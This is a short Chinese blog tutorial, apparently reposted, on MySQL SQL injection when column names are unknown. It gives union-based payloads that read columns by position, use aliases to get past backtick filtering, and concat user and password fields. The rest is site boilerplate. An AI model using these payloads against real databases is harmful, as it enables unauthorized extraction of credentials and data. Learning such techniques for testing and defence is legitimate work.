内容简介:在 mysql => 5 的版本中存在库在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。
在 mysql => 5 的版本中存在库 information_schema ,记录着 mysql 中所有表的结构,通常,在mysql sqli中,我们会通过此库中的表去获取其他表的结构,即表名,列名等。但是这个库也会经常被WAF过滤。当我们通过暴力破解获取到表名后,该如何进行下一步利用呢?
在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。
0x01 不使用表名查询
正常的查询如下:
其中,列名为 id , name , pass , mail , phone ,使用union查询
select 1,2,3,4,5 union select * from users;
接着,就可以继续使用数字来对应列,如3对应了表里面的pass:
select `3` from (select 1,2,3,4,5 union select * from users)a;
当 ` 不能使用的时候,使用别名来代替:
select b from (select 1,2,3 as b,4,5 union select * from users)a;
在注入中查询多个列:
select concat(`2`,0x3a,`3`) from (select 1,2,3,4,5 union select * from users)a limit 1,1;
以上所述就是小编给大家介绍的《不知道列名的情况下注入》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- SQLServer获取临时表所有列名或是否存在指定列名的方法
- pandas 修改 DataFrame 列名
- SQL SERVER动态列名
- postgresql – 在postgres中将表列名更改为大写
- MySQL列名中包含斜杠或者空格的处理方法
- PostgreSQL11: psql 新增 \gdesc 显示查询结果的列名和类型
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Java Web服务:构建与运行
Martin Kalin / 任增刚 / 电子工业出版社 / 2009年11月 / 45.00元
本书以示例驱动的方式详尽地介绍了XML Web服务(JAX-WS)和RESTful Web服务(JAX-RS)二者所涵盖的Java相关API。 《Java Web服务:构建和运行》这本书以清晰、务实的方法讲述Web服务相关技术,提供了混合性的架构总结、完全可以运行的代码示例,以及编译、部署和执行应用程序的一些短小精悍的指令。学习本书,读者将掌握如何从零开始编写Web服务或将已有的服务整合到现......一起来看看 《Java Web服务:构建与运行》 这本书的介绍吧!
MD5 加密
MD5 加密工具
Markdown 在线编辑器
Markdown 在线编辑器